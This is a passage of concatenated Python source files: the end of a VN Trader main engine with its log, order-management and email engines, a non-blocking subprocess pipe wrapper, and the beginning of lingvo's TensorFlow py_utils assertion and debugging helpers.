self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]) -> BaseGateway:
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]) -> "BaseEngine":
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self) -> None:
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = "") -> None:
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str) -> BaseGateway:
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str) -> "BaseEngine":
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str) -> Optional[Dict[str, Any]]:
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self) -> List[str]:
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self) -> List[BaseApp]:
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self) -> List[Exchange]:
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str) -> None:
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str) -> None:
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
# def subscribe_kline(self, req: HistoryRequest, gateway_name: str) -> None:
# gateway = self.get_gateway(gateway_name)
# if gateway:
# gateway.subscribe_kline(req)
def send_order(self, req: OrderRequest, gateway_name: str) -> str:
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str) -> None:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str) -> List[str]:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str) -> None:
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_market_trade(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send query history request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_market_trade(req)
else:
return None
def query_history(self, req: HistoryRequest, gateway_name: str) -> Optional[List[BarData]]:
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def query_account_trade(self, req: AccountTradeRequest, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_account_trade(req=req)
else:
return None
def query_account(self, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_account()
else:
return None
def query_balance(self, req: BalanceRequest, gateway_name: str):
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_balance(req=req)
else:
return None
def close(self) -> None:
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module_bak.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level: int = SETTINGS["log.level"]
self.logger: Logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self) -> None:
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self) -> None:
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self) -> None:
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event) -> None:
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks: Dict[str, TickData] = {}
self.orders: Dict[str, OrderData] = {}
self.trades: Dict[str, TradeData] = {}
self.positions: Dict[str, PositionData] = {}
self.accounts: Dict[str, AccountData] = {}
self.contracts: Dict[str, ContractData] = {}
self.active_orders: Dict[str, OrderData] = {}
self.add_function()
self.register_event()
def add_function(self) -> None:
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self) -> None:
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event) -> None:
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event) -> None:
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event) -> None:
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event) -> None:
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event) -> None:
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event) -> None:
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol: str) -> Optional[TickData]:
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid: str) -> Optional[OrderData]:
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid: str) -> Optional[TradeData]:
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid: str) -> Optional[PositionData]:
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid: str) -> Optional[AccountData]:
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol: str) -> Optional[ContractData]:
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self) -> List[TickData]:
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self) -> List[OrderData]:
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self) -> List[TradeData]:
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self) -> List[PositionData]:
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self) -> List[AccountData]:
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self) -> List[ContractData]:
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = "") -> List[OrderData]:
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread: Thread = Thread(target=self.run)
self.queue: Queue = Queue()
self.active: bool = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = "") -> None:
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = receiver
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self) -> None:
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self) -> None:
""""""
self.active = True
self.thread.start()
def close(self) -> None:
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
process.py
|
from __future__ import print_function
"""
Utility class for spawning and controlling CLI processes.
See: http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
"""
import sys, time
from subprocess import PIPE, Popen
from threading import Thread
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
ON_POSIX = 'posix' in sys.builtin_module_names
class Process(object):
"""
Process encapsulates a subprocess with queued stderr/stdout pipes.
Wraps most methods from subprocess.Popen.
For non-blocking reads, use proc.stdout.get_nowait() or
proc.stdout.get(timeout=0.1).
"""
def __init__(self, exec_args, cwd=None):
self.proc = Popen(exec_args, stdout=PIPE, stdin=PIPE, stderr=PIPE,
bufsize=1, close_fds=ON_POSIX, universal_newlines=True,
cwd=cwd)
self.stdin = self.proc.stdin
#self.stdin = PipePrinter(self.proc.stdin)
self.stdout = PipeQueue(self.proc.stdout)
self.stderr = PipeQueue(self.proc.stderr)
for method in ['poll', 'wait', 'send_signal', 'kill', 'terminate']:
setattr(self, method, getattr(self.proc, method))
class PipePrinter(object):
""" For debugging writes to a pipe.
"""
def __init__(self, pipe):
self._pipe = pipe
def __getattr__(self, attr):
return getattr(self._pipe, attr)
def write(self, strn):
print ("WRITE:" + repr(strn))
return self._pipe.write(strn)
class PipeQueue(Queue):
"""
Queue that starts a second process to monitor a PIPE for new data.
This is needed to allow non-blocking pipe reads.
"""
def __init__(self, pipe):
Queue.__init__(self)
self.thread = Thread(target=self.enqueue_output, args=(pipe, self))
self.thread.daemon = True # thread dies with the program
self.thread.start()
@staticmethod
def enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
#print "READ: " + repr(line)
out.close()
def read(self):
"""
Read all available lines from the queue, concatenated into a single string.
"""
out = ""
while True:
try:
out += self.get_nowait()
except Empty:
break
return out
def readline(self, timeout=None):
""" Read a single line from the queue.
"""
# we break this up into multiple short reads to allow keyboard
# interrupts
start = time.time()
ret = ""
while True:
if timeout is not None:
remaining = start + timeout - time.time()
if remaining <= 0:
return ""
else:
remaining = 1
try:
return self.get(timeout=min(0.1, remaining))
except Empty:
pass
|
py_utils.py
|
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Common utilities."""
# ==============================================================================
# Note: Avoid adding dependencies to py_utils beyond standard python packages
# and tensorflow.
# ==============================================================================
import collections as py_collections
import contextlib
import functools
import hashlib
import inspect
import math
import numbers
import os
import pkgutil
import re
import threading
import traceback
import lingvo.compat as tf
from lingvo.core import cluster_factory
from lingvo.core import gshard_utils
from lingvo.core import hyperparams
from lingvo.core import nested_map
from lingvo.core import ops
from lingvo.core import py_utils_flags
from lingvo.core import retry
from lingvo.core import symbolic
from lingvo.core import thread_local_utils
from lingvo.core import tshape
import numpy as np
import six
# pylint: disable=g-direct-tensorflow-import
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.framework import node_def_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.framework import func_graph
from tensorflow.python.framework import function
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import stateless_random_ops
from tensorflow.python.tf2 import enabled as tf2_enabled
from tensorflow.python.tpu import topology as tf_topology
from tensorflow.python.tpu import tpu_function
from tensorflow.python.util import deprecation
# pylint: enable=g-direct-tensorflow-import
FLAGS = tf.flags.FLAGS
# pylint: disable=protected-access
_FromGlobal = py_utils_flags._FromGlobal
# pylint: enable=protected-access
use_xla = py_utils_flags.use_xla
use_tpu = py_utils_flags.use_tpu
testonly_skip_norm_layers = py_utils_flags.testonly_skip_norm_layers
tpu_compat = py_utils_flags.tpu_compat
use_stateless_vars_init = py_utils_flags.use_stateless_vars_init
ENQUEUE_OPS = '__lingvo_enqueue_ops'
# pylint: disable=protected-access
deprecation._PRINT_DEPRECATION_WARNINGS = False
# pylint: enable=protected-access
ThreadLocalStack = thread_local_utils.ThreadLocalStack
ThreadLocalDict = thread_local_utils.ThreadLocalDict
NestedMap = nested_map.NestedMap
def Assert(condition, data, *args, **kwargs):
if py_utils_flags.enable_asserts():
return tf.Assert(condition, data, *args, **kwargs)
else:
return tf.no_op()
def assert_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_greater_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_greater(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_greater(*args, **kwargs)
else:
return tf.no_op()
def assert_less_equal(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.debugging.assert_less_equal(*args, **kwargs)
else:
return tf.no_op()
def assert_less(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return tf.assert_less(*args, **kwargs)
else:
return tf.no_op()
def assert_between(x, l, r, *args, **kwargs): # pylint: disable=invalid-name
x = tf.convert_to_tensor(x)
l = tf.cast(tf.convert_to_tensor(l), x.dtype)
r = tf.cast(tf.convert_to_tensor(r), x.dtype)
return tf.group([
assert_greater_equal(x, l, *args, **kwargs),
assert_less(x, r, *args, **kwargs)
])
def assert_shape_match(*args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
kwargs['msg'] = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(
r'.*/', '', filepath), line, func)
return ops.assert_shape_match(*args, **kwargs)
else:
return tf.no_op()
def assert_same_dim0(xs, *args, **kwargs): # pylint: disable=invalid-name
if py_utils_flags.enable_asserts():
return ops.assert_same_dim0(xs, *args, **kwargs)
else:
return tf.no_op()
def assert_even_divide(denorm, num): # pylint: disable=invalid-name
"""Asserts that denorm is evenly divided by num."""
denorm = tf.convert_to_tensor(denorm)
num = tf.convert_to_tensor(num)
if denorm.dtype not in (tf.int32, tf.int64):
raise ValueError('denorminator.dtype is not tf.int32 or tf.int64.')
if num.dtype not in (tf.int32, tf.int64):
raise ValueError('numerator.dtype is not tf.int32 or tf.int64.')
num = HasShape(num, GetShape(denorm))
quo = denorm // num
return assert_equal(quo * num, denorm)
def AssertIdShape(expected_ids_shape_pattern, ids_shape, *args):
"""Asserts shape expected_ids_shape_pattern matches all other input shapes."""
def AssertFn(inputs):
dependencies = [
assert_shape_match(inputs.ids_shape, inputs.expected_ids_shape_pattern)
] + [
assert_shape_match(inputs.ids_shape, x_shape) for x_shape in inputs.args
]
return with_dependencies(dependencies, inputs.ids_shape)
inputs = NestedMap(
expected_ids_shape_pattern=expected_ids_shape_pattern,
ids_shape=ids_shape,
args=args)
return CallDefun(AssertFn, Transform(tf.convert_to_tensor, inputs))
def _CheckNumerics(x, message=None, *args, **kwargs):
if x.dtype.is_floating:
x_name = x.name if not tf.executing_eagerly() else '[eager]'
if 'name' not in kwargs:
kwargs['name'] = re.sub(r':\d+', '', x_name) + '_CheckNumerics'
return tf.debugging.check_numerics(x, message if message else x_name, *args,
**kwargs)
else:
return x
def CheckNumerics(inp, message=None, *args, **kwargs):
"""Check numerics for tensors in inp."""
if not py_utils_flags.enable_check_numerics():
return inp
if isinstance(inp, list):
return [_CheckNumerics(x, message, *args, **kwargs) for x in inp]
if isinstance(inp, tuple):
return tuple(_CheckNumerics(x, message, *args, **kwargs) for x in inp)
return _CheckNumerics(inp, message, *args, **kwargs)
def with_dependencies(dependencies, output_tensor): # pylint: disable=invalid-name
with tf.control_dependencies(dependencies):
return tf.identity(output_tensor)
def _VarInCollection(var, collection):
"""Return whether a variable `var` is in the given variable collection."""
# We use variable reference for comparison, since variable is not hashable in
# eager mode.
return var.ref() in [v.ref() for v in collection]
@contextlib.contextmanager
def _PrintOptions(*args, **kwargs):
original = np.get_printoptions()
np.set_printoptions(*args, **kwargs)
try:
yield
finally:
np.set_printoptions(**original)
def _Print(name, x):
with _PrintOptions(linewidth=1000):
tf.logging.info('%s = %s', name, np.array_repr(x))
def Log(value, prefix, **kwargs):
"""Prints out values of tensors.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Log(z, 'debug compute()', x=x, y=y)
Args:
value: A Tensor. Log happens after this tensor's computed.
prefix: Every tensor is logged with this prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
# Ensures tensors are printed in order.
last = value
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Print, [prefix + ' : ' + k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def Debug(tensor, message='', enabled=True, summarize=100, more=None):
"""Wrapper around tf.Print() and tf.logging.info() to simplify debug printing.
x = py_utils.Debug(x)
When the graph is built a regular log info line will be printed:
-DBG- py_utils_test.py:429 x=Tensor(...
Then when the tensor node is evaluated it will print lines like:
-DBG- py_utils_test.py:429 x Const:0[x.shape=][2 2][x=][[1 2][3 4]]
WARNING: The code that parses local variable names can fail. E.g. don't write
two Debug() calls on one line or a Debug() call that spans more than one line.
Args:
tensor: A tensor to print.
message: A message to print.
enabled: To enable the debugging.
summarize: Integer with number of tensor values to print.
more: An optional list of additional tensors.
Returns:
The tensor.
"""
if not enabled or _FromGlobal('disable_py_utils_debug'):
return tensor
if more is None:
more = []
stack = inspect.stack()[1][0]
caller = inspect.getframeinfo(stack)
caller_var = ''
caller_more_vars = []
if caller.code_context:
# Rough and likely to fail. But better than nothing.
match = re.compile(r'Debug\((.*?)(\)|,).*$').search(caller.code_context[0])
if match:
caller_var = match.groups()[0]
if more:
more_vars = re.compile(r'more=\[(.*?)\].*$').search(
caller.code_context[0]).groups()[0]
caller_more_vars = more_vars.split(',')
the_class = ''
if 'self' in stack.f_locals:
the_class = stack.f_locals['self'].__class__.__name__
header = '-DBG- {}:{}:{}:{} {} '.format(
os.path.basename(caller.filename), the_class, caller.function,
caller.lineno, message)
info = '{}{}={}'.format(header, caller_var, tensor)
for name, val in zip(caller_more_vars, more):
info += ' {}={}'.format(name.strip(), val)
tf.logging.info(info)
if isinstance(tensor, tf.Tensor):
tensors = []
tensors += [tf.constant('{}.shape='.format(caller_var)), tf.shape(tensor)]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}.shape='.format(name.strip())), tf.shape(val)]
tensors += [tf.constant('{}='.format(caller_var)), tensor]
for name, val in zip(caller_more_vars, more):
tensors += [tf.constant('{}='.format(name.strip())), val]
name = tensor.name if not tf.executing_eagerly() else '[eager]'
info = '{}{} {}'.format(header, caller_var, name)
return tf.identity(
tf.Print(tensor, tensors, info, summarize=summarize),
re.sub(':.*$', '', name))
return tensor
def _Save(steps, prefix, key, val):
filename = '%s.%08d.%s.npy' % (six.ensure_text(prefix), steps,
six.ensure_text(key))
with tf.io.gfile.GFile(filename, 'w') as outfile:
np.save(outfile, val)
def Save(value, filename_prefix, **kwargs):
"""Saves values of tensors into files.
Useful for debugging. E.g.,
x = ... a tf.Tensor ...
y = ... a tf.Tensor ...
z = compute(x, y)
z = Save(z, '/path/tmp', x=x, y=y, z=z)
Args:
value: A Tensor. Saving happens after this tensor is computed.
filename_prefix: Every tensor is saved with this filename prefix.
**kwargs: keywords and tensors. Tensors are logged in the sort order of
these keywards.
Returns:
value is returned.
"""
last = value
steps = GetGlobalStep()
for k in sorted(kwargs):
with tf.control_dependencies([last]):
last = tf.py_func(_Save, [steps, filename_prefix, k, kwargs[k]], [])
with tf.control_dependencies([last]):
return tf.identity(value)
def HasRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has the expected rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims == expected_rank, (
'Ranks did not match, got %d, '
'expected %d') % (tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies([tf.assert_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def HasAtLeastRank(tensor, expected_rank):
"""Syntactic sugar for asserting that tensor has rank >= expected_rank."""
if tensor.shape.ndims is not None and isinstance(expected_rank, int):
assert tensor.shape.ndims >= expected_rank, (
'Rank of tensor %d did not exceed the expected value %d.') % (
tensor.shape.ndims, expected_rank)
return tensor
if py_utils_flags.enable_asserts():
return with_dependencies(
[tf.debugging.assert_greater_equal(tf.rank(tensor), expected_rank)],
tensor)
else:
return tensor
def GetRank(tensor):
"""Returns tensor's rank as an int if it's available, otherwise a Tensor.
Args:
tensor: The input tensor.
Returns:
Either an int or a Tensor for the rank of the input tensor.
"""
if tensor.shape.ndims is not None:
return tensor.shape.ndims # int
else:
return tf.rank(tensor) # Tensor
def GetShape(tensor, ndims=None):
"""Returns tensor's shape as a list which can be unpacked, unlike tf.shape.
Tries to return static shape if it's available. Note that this means
some of the outputs will be ints while the rest will be Tensors.
Args:
tensor: The input tensor.
ndims: If not None, returns the shapes for the first `ndims` dimensions.
"""
tensor = tf.convert_to_tensor(tensor)
dynamic_shape = tf.shape(tensor)
# Early exit for unranked tensor.
if tensor.shape.ndims is None:
if ndims is None:
return dynamic_shape
else:
return [dynamic_shape[x] for x in range(ndims)]
# Ranked tensor.
if ndims is None:
ndims = tensor.shape.ndims
else:
ndims = min(ndims, tensor.shape.ndims)
# Return mixture of static and dynamic dims.
static_shape = tensor.shape.as_list()
shapes = [
static_shape[x] if static_shape[x] is not None else dynamic_shape[x]
for x in range(ndims)
]
return shapes
def HasShape(tensor, expected_shape, ndims=None):
"""Syntactic sugar for asserting that tensor has the expected shape.
Args:
tensor: A Tensor.
expected_shape: A Python list or a 1D tensor. Elements of expected_shape can
be -1 which indicate that any size is valid for that dimension.
ndims: If not None, check only the first `ndims` dimensions of `tensor`.
Must be equal to the length of `expected_shape` if not None.
Returns:
The input `tensor` with control dependencies that will raise a runtime
error if dynamic shape checks fail.
Raises:
ValueError: A value error if the assertion fails at static shape checks.
"""
if not py_utils_flags.enable_asserts():
return tensor
filepath, line, func, _ = traceback.extract_stack(limit=3)[-2]
msg = 'LINGVO ASSERT %s:%s(%s)' % (re.sub(r'.*/', '',
filepath), line, func)
tensor_shape = GetShape(tensor)
if ndims is not None:
tensor_shape = tensor_shape[:ndims]
# TODO(jngiam): Attempt to switch back to tf.Assert after it has better
# support on GPUs.
assert_op = ops.assert_shape_match(tensor_shape, expected_shape, msg=msg)
# If expected_shape is a Tensor, then we are unable to perform static checks.
# In this case, we can do a dynamic check and return.
if isinstance(expected_shape, tf.Tensor):
return with_dependencies([assert_op], tensor)
# Infer ranks from the inputs.
expected_rank = len(expected_shape)
if isinstance(tensor_shape, tf.Tensor):
tensor_rank = tensor.shape.ndims
else:
tensor_rank = len(tensor_shape)
# If ndims is None, then either one of the ranks should not be None, or they
# should both match. If both ranks are None, then they are both tensors and
# should be caught by the earlier short-circuit.
if ndims is None:
if (tensor_rank is not None) and (expected_rank != tensor_rank):
raise ValueError('Tensor does not match rank of expected shape.\n'
'Tensor shape: {} Expected shape: {}'.format(
tensor_shape, expected_shape))
# Both tensors can be assumed to be of same rank.
ndims = expected_rank
else:
if (tensor_rank is not None) and (tensor_rank < ndims):
raise ValueError('Tensor has fewer dimensions than ndims.\n'
'Tensor shape: {} ndims: {}'.format(tensor_shape, ndims))
if expected_rank != ndims:
raise ValueError(
'Expected shape must have number of dimensions equal to ndims.\n'
'Expected shape: {} ndims: {}'.format(expected_shape, ndims))
# Ensure that both tensor_shape and expected_shape are both lists.
tensor_shape = tensor_shape[:ndims]
if isinstance(tensor_shape, tf.Tensor):
tensor_shape = tf.unstack(tensor_shape, num=ndims)
# Map tf.Dimension values to their held values.
tensor_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in tensor_shape
]
expected_shape = [
v.value if isinstance(v, tf.Dimension) else v for v in expected_shape
]
all_static_checks = True
for idx, (dim, expected_dim) in enumerate(zip(tensor_shape, expected_shape)):
if isinstance(expected_dim, tf.Tensor):
all_static_checks = False
elif expected_dim == -1:
continue
elif isinstance(dim, tf.Tensor):
all_static_checks = False
elif dim != expected_dim:
raise ValueError('Tensor does not match expected shape on dimension {}.\n'
'Tensor shape: {} Expected shape: {}'.format(
idx, tensor_shape, expected_shape))
if all_static_checks:
return tf.convert_to_tensor(tensor)
else:
return with_dependencies([assert_op], tensor)
def HasSameShape(x, ref):
return HasShape(x, GetShape(ref))
def GetSize(tensor):
shape = GetShape(tensor)
if (isinstance(shape, tf.Tensor) or
any([isinstance(x, tf.Tensor) for x in shape])):
return tf.size(tensor)
return np.prod(shape)
def CausalSelfAttenPadding(seqlen, dtype):
"""Wraps tf.linalg.band_part() for tflite compatibility."""
if FLAGS.tflite_compatible:
# [N, 1]
rows = tf.expand_dims(tf.range(seqlen), -1)
# [1, N]
cols = tf.expand_dims(tf.range(seqlen), 0)
row_cols = rows - cols
return tf.where(row_cols < 0, tf.ones([seqlen, seqlen], dtype),
tf.zeros([seqlen, seqlen], tf.float32))
else:
return 1.0 - tf.linalg.band_part(
tf.ones([seqlen, seqlen], dtype=dtype), -1, 0)
def outside_all_rewrites(): # pylint: disable=invalid-name
return tf.control_dependencies(None)
# TODO(jamesqin): remove once b/147439702 is fixed.
_OUTSIDE_COMPILATION = threading.local()
def RunOnTpuHost(func, *args, **kwargs):
r"""Runs the given function call on TPU host.
Invokes func(\*args, \*\*kwargs) directly if not running on tpu.
Args:
func: the function to invoke.
*args: args of func
**kwargs: kwargs of func
Returns:
The function return value.
"""
if use_tpu() and not getattr(_OUTSIDE_COMPILATION, 'on', False):
_OUTSIDE_COMPILATION.on = True
res = tf.tpu.outside_compilation(func, *args, **kwargs)
_OUTSIDE_COMPILATION.on = False
else:
res = func(*args, **kwargs)
return res
def tpu_host(func): # pylint: disable=invalid-name
r"""Decorates a python function to only run on TPU hosts.
This function has no effect when running on CPU/GPU.
Example::
@py_utils.tpu_host()
def ComputeWER(self):
# Call a custom op computing WER.
Args:
func: the function to invoke
Returns:
A TPU-host only function
"""
def Wrapped(*args, **kwargs):
return RunOnTpuHost(func, *args, **kwargs)
return Wrapped
# Maps a TPU job name ('/job:xxx') to the job's DeviceAssignment object.
# When there is only a single TPU job, the key could be None.
_tpu_device_assignment_dict = dict()
def SetTpuDeviceAssignment(tpu_device_assignment, job=None):
if job in _tpu_device_assignment_dict:
tf.logging.warning('tpu_device_assignment was already set, '
'overwriting with new assignment.')
_tpu_device_assignment_dict[job] = tpu_device_assignment
# This function should called in unittest only.
def ClearTpuDevice():
